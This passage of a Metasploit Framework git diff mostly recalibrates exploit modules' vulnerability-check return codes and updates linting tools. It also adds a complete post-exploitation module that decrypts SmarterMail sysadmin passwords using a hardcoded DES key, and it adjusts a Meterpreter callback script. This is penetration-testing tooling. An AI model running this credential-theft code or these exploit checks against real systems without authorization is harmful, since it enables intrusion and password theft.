(version =~ /9\.00\.1399\.06/) - return Exploit::CheckCode::Vulnerable if (version =~ /9\.00\.2047\.00/) - return Exploit::CheckCode::Vulnerable if (version =~ /9\.00\.3042\.00/) + return Exploit::CheckCode::Appears if (version =~ /8\.00\.194/) + return Exploit::CheckCode::Appears if (version =~ /8\.00\.384/) + return Exploit::CheckCode::Appears if (version =~ /8\.00\.534/) + return Exploit::CheckCode::Appears if (version =~ /8\.00\.760/) + return Exploit::CheckCode::Appears if (version =~ /8\.00\.2039/) + return Exploit::CheckCode::Appears if (version =~ /9\.00\.1399\.06/) + return Exploit::CheckCode::Appears if (version =~ /9\.00\.2047\.00/) + return Exploit::CheckCode::Appears if (version =~ /9\.00\.3042\.00/) return Exploit::CheckCode::Safe end diff --git a/modules/exploits/windows/mysql/scrutinizer_upload_exec.rb b/modules/exploits/windows/mysql/scrutinizer_upload_exec.rb index 121bb1b81a..0d03a237e8 100644 --- a/modules/exploits/windows/mysql/scrutinizer_upload_exec.rb +++ b/modules/exploits/windows/mysql/scrutinizer_upload_exec.rb @@ -75,7 +75,7 @@ class Metasploit3 < Msf::Exploit::Remote datastore['RPORT'] = tmp_rport if res and res.body =~ /\<title\>Scrutinizer\<\/title\>/ and res.body =~ /\<div id\=\'.+\'\>Scrutinizer 9\.[0-5]\.[0-2]\<\/div\>/ - return Exploit::CheckCode::Vulnerable + return Exploit::CheckCode::Appears end return Exploit::CheckCode::Safe diff --git a/modules/exploits/windows/novell/netiq_pum_eval.rb b/modules/exploits/windows/novell/netiq_pum_eval.rb index 70cf850d07..238b71aef4 100644 --- a/modules/exploits/windows/novell/netiq_pum_eval.rb +++ b/modules/exploits/windows/novell/netiq_pum_eval.rb @@ -75,8 +75,8 @@ class Metasploit3 < Msf::Exploit::Remote 'data' => data, }) - if res and res.body =~ /onResult/ and res.body =~ /Invalid user name or password/ and res.body =~ /2.3.1/ - return Exploit::CheckCode::Vulnerable + if res and res.body =~ /onResult/ and res.body =~ /Invalid user name or password/ and res.body =~ /2\.3\.1/ + return Exploit::CheckCode::Appears elsif res and res.body =~ /onResult/ and res.body =~ /Invalid user name or password/ return Exploit::CheckCode::Detected end diff --git a/modules/exploits/windows/oracle/client_system_analyzer_upload.rb b/modules/exploits/windows/oracle/client_system_analyzer_upload.rb index 88064ab1e8..5078c34d36 100644 --- a/modules/exploits/windows/oracle/client_system_analyzer_upload.rb +++ b/modules/exploits/windows/oracle/client_system_analyzer_upload.rb @@ -113,7 +113,7 @@ class Metasploit3 < Msf::Exploit::Remote print_status("Uploading the CSA#{file_name}.txt file") res = upload_file(data) if not res or res.code != 200 or (res.body !~ /posted data was written to placeholder file/ and res.body !~ /csaPostStatus=0/) - print_error("The test file could not be uploaded") + vprint_error("The test file could not be uploaded") return Exploit::CheckCode::Safe end diff --git a/modules/exploits/windows/oracle/tns_arguments.rb b/modules/exploits/windows/oracle/tns_arguments.rb index 378df9dbf8..15e6217fe1 100644 --- a/modules/exploits/windows/oracle/tns_arguments.rb +++ b/modules/exploits/windows/oracle/tns_arguments.rb @@ -52,23 +52,18 @@ class Metasploit3 < Msf::Exploit::Remote def check connect - version = "(CONNECT_DATA=(COMMAND=VERSION))" - pkt = tns_packet(version) - sock.put(pkt) - sock.get_once - res = sock.get_once(-1, 1) - disconnect - if ( res and res =~ /32-bit Windows: Version 8\.1\.7\.0\.0/ ) - return Exploit::CheckCode::Vulnerable - end - return Exploit::CheckCode::Safe + if ( res and res =~ /32-bit Windows: Version 8\.1\.7\.0\.0/ ) + return Exploit::CheckCode::Appears + end + + return Exploit::CheckCode::Safe end def exploit diff --git a/modules/exploits/windows/oracle/tns_auth_sesskey.rb b/modules/exploits/windows/oracle/tns_auth_sesskey.rb index 3740af9de8..a75969a235 100644 --- a/modules/exploits/windows/oracle/tns_auth_sesskey.rb +++ b/modules/exploits/windows/oracle/tns_auth_sesskey.rb @@ -73,11 +73,12 @@ class Metasploit3 < Msf::Exploit::Remote def check version = tns_version if (not version) - fail_with(Failure::Unknown, "Unable to detect the Oracle version!") + vprint_error("Unable to detect the Oracle version!") + return Exploit::CheckCode::Unknown end - print_status("Oracle version reply: " + version) - return Exploit::CheckCode::Vulnerable if (version =~ /32-bit Windows: Version 10\.2\.0\.1\.0/) - return Exploit::CheckCode::Vulnerable if (version =~ /32-bit Windows: Version 10\.2\.0\.4\.0/) + vprint_status("Oracle version reply: " + version) + return Exploit::CheckCode::Appears if (version =~ /32-bit Windows: Version 10\.2\.0\.1\.0/) + return Exploit::CheckCode::Appears if (version =~ /32-bit Windows: Version 10\.2\.0\.4\.0/) return Exploit::CheckCode::Safe end diff --git a/modules/exploits/windows/oracle/tns_service_name.rb b/modules/exploits/windows/oracle/tns_service_name.rb index 42468a055d..3eaa4cf412 100644 --- a/modules/exploits/windows/oracle/tns_service_name.rb +++ b/modules/exploits/windows/oracle/tns_service_name.rb @@ -64,7 +64,7 @@ class Metasploit3 < Msf::Exploit::Remote disconnect if ( res and res =~ /32-bit Windows: Version 8\.1\.7\.0\.0/ ) - return Exploit::CheckCode::Vulnerable + return Exploit::CheckCode::Appears end return Exploit::CheckCode::Safe end diff --git a/modules/exploits/windows/postgres/postgres_payload.rb b/modules/exploits/windows/postgres/postgres_payload.rb index 216f67b212..6635980c29 100644 --- a/modules/exploits/windows/postgres/postgres_payload.rb +++ b/modules/exploits/windows/postgres/postgres_payload.rb @@ -58,7 +58,7 @@ class Metasploit3 < Msf::Exploit::Remote if version[:auth] print_status "Authentication successful. Version: #{version}" - return CheckCode::Vulnerable + return CheckCode::Appears # WRITE permission needs to be proven to get CheckCode::Vulnerable else print_error "Authentication failed. #{version[:preauth] || version[:unknown]}" return CheckCode::Safe diff --git a/modules/exploits/windows/proxy/ccproxy_telnet_ping.rb b/modules/exploits/windows/proxy/ccproxy_telnet_ping.rb index e4da02825c..1a4dee483c 100644 --- a/modules/exploits/windows/proxy/ccproxy_telnet_ping.rb +++ b/modules/exploits/windows/proxy/ccproxy_telnet_ping.rb @@ -62,7 +62,7 @@ class Metasploit3 < Msf::Exploit::Remote disconnect if (banner =~ /CCProxy Telnet Service Ready/) - return Exploit::CheckCode::Appears + return Exploit::CheckCode::Detected end return Exploit::CheckCode::Safe end diff --git a/modules/exploits/windows/proxy/qbik_wingate_wwwproxy.rb b/modules/exploits/windows/proxy/qbik_wingate_wwwproxy.rb index cd52220873..e1d85b055b 100644 --- a/modules/exploits/windows/proxy/qbik_wingate_wwwproxy.rb +++ b/modules/exploits/windows/proxy/qbik_wingate_wwwproxy.rb @@ -58,7 +58,7 @@ class Metasploit3 < Msf::Exploit::Remote sock.put("GET /\r\n\r\n") # Malformed request to get proxy info banner = sock.get_once || '' if (banner =~ /Server:\sWinGate\s6.1.1\s\(Build 1077\)/) - return Exploit::CheckCode::Vulnerable + return Exploit::CheckCode::Appears end return Exploit::CheckCode::Safe end diff --git a/modules/exploits/windows/scada/indusoft_webstudio_exec.rb b/modules/exploits/windows/scada/indusoft_webstudio_exec.rb index edfaed5062..addf1d8f3a 100644 --- a/modules/exploits/windows/scada/indusoft_webstudio_exec.rb +++ b/modules/exploits/windows/scada/indusoft_webstudio_exec.rb @@ -64,7 +64,7 @@ class Metasploit3 < Msf::Exploit::Remote disconnect if app_info =~ /InduSoft Web Studio v6\.1/ - return Exploit::CheckCode::Vulnerable + return Exploit::CheckCode::Appears elsif app_info =~ /InduSoft Web Studio/ return Exploit::CheckCode::Detected end diff --git a/modules/exploits/windows/scada/procyon_core_server.rb b/modules/exploits/windows/scada/procyon_core_server.rb index 9db451612c..938db3f92e 100644 --- a/modules/exploits/windows/scada/procyon_core_server.rb +++ b/modules/exploits/windows/scada/procyon_core_server.rb @@ -74,8 +74,9 @@ class Metasploit3 < Msf::Exploit::Remote disconnect if res =~ /Core Command Interface V1\.(.*)2/ - return Exploit::CheckCode::Vulnerable + return Exploit::CheckCode::Appears end + return Exploit::CheckCode::Safe end diff --git a/modules/exploits/windows/smb/ms08_067_netapi.rb b/modules/exploits/windows/smb/ms08_067_netapi.rb index c97844902e..e6db55dee7 100644 --- a/modules/exploits/windows/smb/ms08_067_netapi.rb +++ b/modules/exploits/windows/smb/ms08_067_netapi.rb @@ -1053,12 +1053,12 @@ class Metasploit3 < Msf::Exploit::Remote connect() smb_login() rescue Rex::ConnectionError => e - print_error("Connection failed: #{e.class}: #{e}") - return + vprint_error("Connection failed: #{e.class}: #{e}") + return Msf::Exploit::CheckCode::Unknown rescue Rex::Proto::SMB::Exceptions::LoginError => e if (e.message =~ /Connection reset/) - print_error("Connection reset during login") - print_error("This most likely means a previous exploit attempt caused the service to crash") + vprint_error("Connection reset during login") + vprint_error("This most likely means a previous exploit attempt caused the service to crash") return Msf::Exploit::CheckCode::Unknown else raise e @@ -1086,7 +1086,8 @@ class Metasploit3 < Msf::Exploit::Remote begin # Samba doesn't have this handle and returns an ErrorCode dcerpc_bind(handle) - rescue Rex::Proto::SMB::Exceptions::ErrorCode + rescue Rex::Proto::SMB::Exceptions::ErrorCode => e + vprint_error("SMB error: #{e.message.to_s}") return Msf::Exploit::CheckCode::Safe end @@ -1111,7 +1112,7 @@ class Metasploit3 < Msf::Exploit::Remote if (error == 0x0052005c) # \R :) return Msf::Exploit::CheckCode::Vulnerable else - print_status("System is not vulnerable (status: 0x%08x)" % error) if error + vprint_error("System is not vulnerable (status: 0x%08x)" % error) if error return Msf::Exploit::CheckCode::Safe end end diff --git a/modules/exploits/windows/smtp/mailcarrier_smtp_ehlo.rb b/modules/exploits/windows/smtp/mailcarrier_smtp_ehlo.rb index 2dcaf2aff2..c97901a355 100644 --- a/modules/exploits/windows/smtp/mailcarrier_smtp_ehlo.rb +++ b/modules/exploits/windows/smtp/mailcarrier_smtp_ehlo.rb @@ -62,7 +62,7 @@ class Metasploit3 < Msf::Exploit::Remote disconnect if (banner =~ /ESMTP TABS Mail Server for Windows NT/) - return Exploit::CheckCode::Appears + return Exploit::CheckCode::Detected end return Exploit::CheckCode::Safe end diff --git a/modules/exploits/windows/smtp/ypops_overflow1.rb b/modules/exploits/windows/smtp/ypops_overflow1.rb index 25deefe2c3..41708b4586 100644 --- a/modules/exploits/windows/smtp/ypops_overflow1.rb +++ b/modules/exploits/windows/smtp/ypops_overflow1.rb @@ -62,11 +62,11 @@ class Metasploit3 < Msf::Exploit::Remote banner.gsub!(/\n/, '') if banner =~ /YahooPOPs! Simple Mail Transfer Service Ready/ - print_status("Vulnerable SMTP server: #{banner}") + vprint_status("Vulnerable SMTP server: #{banner}") return Exploit::CheckCode::Detected end - print_status("Unknown SMTP server: #{banner}") + vprint_status("Unknown SMTP server: #{banner}") return Exploit::CheckCode::Safe end diff --git a/modules/exploits/windows/ssh/freesshd_authbypass.rb b/modules/exploits/windows/ssh/freesshd_authbypass.rb index 5068e44677..f4a6b4b396 100644 --- a/modules/exploits/windows/ssh/freesshd_authbypass.rb +++ b/modules/exploits/windows/ssh/freesshd_authbypass.rb @@ -73,8 +73,8 @@ class Metasploit3 < Msf::Exploit::Remote disconnect if banner =~ /SSH\-2\.0\-WeOnlyDo/ version=banner.split(" ")[1] - return Exploit::CheckCode::Vulnerable if version =~ /(2\.1\.3|2\.0\.6)/ - return Exploit::CheckCode::Appears + return Exploit::CheckCode::Appears if version =~ /(2\.1\.3|2\.0\.6)/ + return Exploit::CheckCode::Detected end return Exploit::CheckCode::Safe end diff --git a/modules/exploits/windows/ssh/sysax_ssh_username.rb b/modules/exploits/windows/ssh/sysax_ssh_username.rb index 7700f50f8c..feb189f068 100644 --- a/modules/exploits/windows/ssh/sysax_ssh_username.rb +++ b/modules/exploits/windows/ssh/sysax_ssh_username.rb @@ -75,10 +75,13 @@ class Metasploit3 < Msf::Exploit::Remote connect banner = sock.get_once(-1,5) || '' disconnect + vprint_status("Banner: #{banner}") if banner =~ /SSH\-2\.0\-SysaxSSH_1\.0/ - return Exploit::CheckCode::Vulnerable + return Exploit::CheckCode::Appears end rescue + vprint_error("An error has occured while trying to read a response from target") + return Exploit::CheckCode::Unknown end return Exploit::CheckCode::Safe diff --git a/modules/exploits/windows/telnet/gamsoft_telsrv_username.rb b/modules/exploits/windows/telnet/gamsoft_telsrv_username.rb index 3da111b348..548edfabf6 100644 --- a/modules/exploits/windows/telnet/gamsoft_telsrv_username.rb +++ b/modules/exploits/windows/telnet/gamsoft_telsrv_username.rb @@ -82,12 +82,13 @@ class Metasploit3 < Msf::Exploit::Remote def check connect - print_status("Attempting to determine if target is vulnerable...") + print_status("Attempting to determine if target is possibly vulnerable...") select(nil,nil,nil,7) banner = sock.get_once(-1,3) || '' + vprint_status("Banner: #{banner}") if (banner =~ /TelSrv 1\.5/) - return Exploit::CheckCode::Vulnerable + return Exploit::CheckCode::Appears end return Exploit::CheckCode::Safe end diff --git a/modules/post/windows/gather/credentials/smartermail.rb b/modules/post/windows/gather/credentials/smartermail.rb new file mode 100644 index 0000000000..1a9e2530d3 --- /dev/null +++ b/modules/post/windows/gather/credentials/smartermail.rb @@ -0,0 +1,145 @@ +## +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' +require 'msf/core/auxiliary/report' + +class Metasploit3 < Msf::Post + + include Msf::Post::File + include Msf::Auxiliary::Report + + def initialize(info = {}) + super(update_info( + info, + 'Name' => 'Windows Gather SmarterMail Password Extraction', + 'Description' => %q{ + This module extracts and decrypts the sysadmin password in the + SmarterMail 'mailConfig.xml' configuration file. The encryption + key and IV are publicly known. + + This module has been tested successfully on SmarterMail versions + 10.7.4842 and 11.7.5136. + }, + 'License' => MSF_LICENSE, + 'Author' => [ + 'Joe Giron', # Discovery and PoC (@theonlyevil1) + 'Brendan Coles <bcoles[at]gmail.com>', # Metasploit + 'sinn3r' # shell session support + ], + 'References' => + [ + ['URL', 'http://www.gironsec.com/blog/tag/cracking-smartermail/'] + ], + 'Platform' => ['win'], + 'SessionTypes' => ['meterpreter', 'shell'] + )) + end + + def r_host + if session.type =~ /meterpreter/ + session.sock.peerhost + else + session.session_host + end + end + + def peer + if session.type =~ /meterpreter/ + "#{r_host} (#{sysinfo['Computer']})" + else + r_host + end + end + + # + # Decrypt DES encrypted password string + # + def decrypt_des(encrypted) + return nil if encrypted.nil? + decipher = OpenSSL::Cipher::DES.new + decipher.decrypt + decipher.key = "\xb9\x9a\x52\xd4\x58\x77\xe9\x18" + decipher.iv = "\x52\xe9\xc3\x9f\x13\xb4\x1d\x0f" + decipher.update(encrypted) + decipher.final + end + + # + # Find SmarterMail 'mailConfig.xml' config file + # + def get_mail_config_path + found_path = '' + drive = expand_path('%SystemDrive%').strip + + ['Program Files (x86)', 'Program Files'].each do |program_dir| + path = %Q|#{drive}\\#{program_dir}\\SmarterTools\\SmarterMail\\Service\\mailConfig.xml|.strip + vprint_status "#{peer} - Checking for SmarterMail config file: #{path}" + if file?(path) + found_path = path + break + end + end + + found_path + end + + # + # Retrieve username and decrypt encrypted password string from the config file + # + def get_smartermail_creds(path) + result = {} + data = '' + + vprint_status "#{peer} - Retrieving SmarterMail sysadmin password" + begin + data = read_file(path) + rescue Rex::Post::Meterpreter::RequestError => e + print_error "#{peer} - Failed to download #{path} - #{e.to_s}" + return result + end + + if data.blank? + print_error "#{peer} - Configuration file is empty." + return result + end + + username = data.match(/<sysAdminUserName>(.+)<\/sysAdminUserName>/) + password = data.match(/<sysAdminPassword>(.+)<\/sysAdminPassword>/) + result['username'] = username[1] unless username.nil? + result['password'] = decrypt_des(Rex::Text.decode_base64(password[1])) unless password.nil? + result + end + + # + # Find the config file, extract the encrypted password and decrypt it + # + def run + # check for SmartMail config file + config_path = get_mail_config_path + if config_path.blank? + print_error "#{peer} - Could not find SmarterMail config file" + return + end + + # retrieve username and decrypted password from config file + result = get_smartermail_creds(config_path) + if result['password'].nil? + print_error "#{peer} - Could not decrypt password string" + return + end + + # report result + user = result['username'] + pass = result['password'] + print_good "#{peer} - Found Username: '#{user}' Password: '#{pass}'" + report_auth_info( + :host => r_host, + :sname => 'http', + :user => user, + :pass => pass, + :source_id => session.db_record ? session.db_record.id : nil, + :source_type => 'vuln') + end +end diff --git a/scripts/shell/spawn_meterpreter.rb b/scripts/shell/spawn_meterpreter.rb index d45e9d4ac4..87a87ce691 100644 --- a/scripts/shell/spawn_meterpreter.rb +++ b/scripts/shell/spawn_meterpreter.rb @@ -18,17 +18,39 @@ def progress(total, sent) end -raise RuntimeError, "You must select a session." if (not session) -raise RuntimeError, "Selected session is not a command shell session!" if (session.type != "shell") +# +# Returns if a port is used by a session +# +def is_port_used?(port) + framework.sessions.each do |sid, obj| + local_info = obj.instance_variable_get(:@local_info) + return true if local_info =~ /:#{port}$/ + end -# Check for required datastore options -if (not session.exploit_datastore['LHOST'] or not session.exploit_datastore['LPORT']) - raise RuntimeError, "You must set LPORT and LHOST for this script to work." + false end +# +# Mimics what MSF alreayd does if the user doesn't manually select a payload and lhost +# +lhost = framework.datastore['LHOST'] +unless lhost + lhost = Rex::Socket.source_address +end -lhost = session.exploit_datastore['LHOST'] -lport = session.exploit_datastore['LPORT'] +# +# If there is no LPORT defined in framework, then pick a random one that's not used +# by current sessions. This is possible if the user assumes module datastore options +# are the same as framework datastore options. +# +lport = framework.datastore['LPORT'] +unless lport + lport = 4444 # Default meterpreter port + while is_port_used?(lport) + # Pick a port that's not used + lport = [*49152..65535].sample + end +end # maybe we want our sessions going to another instance? use_handler = true diff --git a/spec/msfcli_spec.rb b/spec/msfcli_spec.rb index d2133b28ff..1cf222b4e6 100644 --- a/spec/msfcli_spec.rb +++ b/spec/msfcli_spec.rb @@ -369,7 +369,7 @@ describe Msfcli do m = cli.init_modules cli.engage_mode(m) } - stdout.should =~ /failed/ + stdout.should =~ /#{Msf::Exploit::CheckCode::Unknown[1]}/ end it "should warn my auxiliary module isn't supported by mode 'p' (show payloads)" do diff --git a/tools/metasm_shell.rb b/tools/metasm_shell.rb index 68f8126db1..c2610105b3 100755 --- a/tools/metasm_shell.rb +++ b/tools/metasm_shell.rb @@ -127,6 +127,7 @@ class String end def parse_gas_file(filename) + filename = File.expand_path(filename) unless ::File.exist?(filename) puts "File #{filename} not found" return diff --git a/tools/msftidy.rb b/tools/msftidy.rb index 3437280c99..bc763fbaa9 100755 --- a/tools/msftidy.rb +++ b/tools/msftidy.rb @@ -8,8 +8,10 @@ # require 'fileutils' require 'find' +require 'time' CHECK_OLD_RUBIES = !!ENV['MSF_CHECK_OLD_RUBIES'] +SPOTCHECK_RECENT = !!ENV['MSF_SPOTCHECK_RECENT'] if CHECK_OLD_RUBIES require 'rvm' @@ -38,36 +40,49 @@ class Msftidy LONG_LINE_LENGTH = 200 # From 100 to 200 which is stupidly long - attr_reader :full_filepath, :source, :stat, :name + # Status codes + OK = 0x00 + WARNINGS = 0x10 + ERRORS = 0x20 + + attr_reader :full_filepath, :source, :stat, :name, :status def initialize(source_file) @full_filepath = source_file @source = load_file(source_file) + @status = OK @name = File.basename(source_file) end public - ## # - # The following two functions only print what you throw at them, - # with the option of displying the line number. error() is meant - # for mistakes that might actually break something. + # Display a warning message, given some text and a number. Warnings + # are usually style issues that may be okay for people who aren't core + # Framework developers. # - ## - - def warn(txt, line=0) - line_msg = (line>0) ? ":#{line.to_s}" : '' + # @return status [Integer] Returns WARNINGS unless we already have an + # error. + def warn(txt, line=0) line_msg = (line>0) ? ":#{line}" : '' puts "#{@full_filepath}#{line_msg} - [#{'WARNING'.yellow}] #{txt}" + @status == ERRORS ? @status = ERRORS : @status = WARNINGS end + # + # Display an error message, given some text and a number. Errors + # can break things or are so egregiously bad, style-wise, that they + # really ought to be fixed. + # + # @return status [Integer] Returns ERRORS def error(txt, line=0) - line_msg = (line>0) ? ":#{line.to_s}" : '' + line_msg = (line>0) ? ":#{line}" : '' puts "#{@full_filepath}#{line_msg} - [#{'ERROR'.red}] #{txt}" + @status = ERRORS end + # Currently unused, but some day msftidy will fix errors for you. def fixed(txt, line=0) - line_msg = (line>0) ? ":#{line.to_s}" : '' + line_msg = (line>0) ? ":#{line}" : '' puts "#{@full_filepath}#{line_msg} - [#{'FIXED'.green}] #{txt}" end @@ -90,12 +105,24 @@ class Msftidy end end + def check_nokogiri + msg = "Requiring Nokogiri in modules can be risky, use REXML instead." + has_nokogiri = false + @source.each_line do |line| + if line =~ /^\s*(require|load)\s+['"]nokogiri['"]/ + has_nokogiri = true + break + end + end + error(msg) if has_nokogiri + end + def check_ref_identifiers in_super = false in_refs = false @source.each_line do |line| - if !in_super and line =~ /[\n\t]+super\(/ + if !in_super and line =~ /\s+super\(/ in_super = true elsif in_super and line =~ /[[:space:]]*def \w+[\(\w+\)]*/ in_super = false @@ -204,7 +231,7 @@ class Msftidy # # Mark our "super" code block # - if !in_super and line =~ /[\n\t]+super\(/ + if !in_super and line =~ /\s+super\(/ in_super = true elsif in_super and line =~ /[[:space:]]*def \w+[\(\w+\)]*/ in_super = false @@ -399,7 +426,7 @@ class Msftidy end if (ln.length > LONG_LINE_LENGTH) - warn("Line exceeding #{LONG_LINE_LENGTH.to_s} bytes", idx) + warn("Line exceeding #{LONG_LINE_LENGTH} bytes", idx) end if ln =~ /[ \t]$/ @@ -447,6 +474,13 @@ class Msftidy } end + def check_vuln_codes + checkcode = @source.scan(/(Exploit::)?CheckCode::(\w+)/).flatten[1] + if checkcode and checkcode !~ /^Unknown|Safe|Detected|Appears|Vulnerable|Unsupported$/ + error("Unrecognized checkcode: #{checkcode}") + end + end + private def load_file(file) @@ -458,10 +492,16 @@ class Msftidy end end +# +# Run all the msftidy checks. +# +# @param full_filepath [String] The full file path to check +# @return status [Integer] A status code suitable for use as an exit status def run_checks(full_filepath) tidy = Msftidy.new(full_filepath) tidy.check_mode tidy.check_shebang + tidy.check_nokogiri tidy.check_ref_identifiers tidy.check_old_keywords tidy.check_verbose_option @@ -476,6 +516,8 @@ def run_checks(full_filepath) tidy.check_lines tidy.check_snake_case_filename tidy.check_comment_splat + tidy.check_vuln_codes + return tidy end ## @@ -486,9 +528,25 @@ end dirs = ARGV -if dirs.length < 1 - $stderr.puts "Usage: #{File.basename(__FILE__)} <directory or file>" - exit(1) +if SPOTCHECK_RECENT + msfbase = %x{\\git rev-parse --show-toplevel}.strip + if File.directory? msfbase + Dir.chdir(msfbase) + else + $stderr.puts "You need a git binary in your path to use this functionality." + exit(0x02) + end + last_release = %x{\\git tag -l #{DateTime.now.year}\\*}.split.last + new_modules = %x{\\git diff #{last_release}..HEAD --name-only --diff-filter A modules} + dirs = dirs | new_modules.split +end + +# Don't print an error if there's really nothing to check. +unless SPOTCHECK_RECENT + if dirs.length < 1 + $stderr.puts "Usage: #{File.basename(__FILE__)} <directory or file>" + exit(0x01) + end end dirs.each do |dir| @@ -497,9 +555,12 @@ dirs.each do |dir| next if full_filepath =~ /\.git[\x5c\x2f]/ next unless File.file? full_filepath next unless full_filepath =~ /\.rb$/ - run_checks(full_filepath) + msftidy = run_checks(full_filepath) + @exit_status = msftidy.status if (msftidy.status > @exit_status.to_i) end rescue Errno::ENOENT $stderr.puts "#{File.basename(__FILE__)}: #{dir}: No such file or directory" end end + +exit(@exit_status.to_i)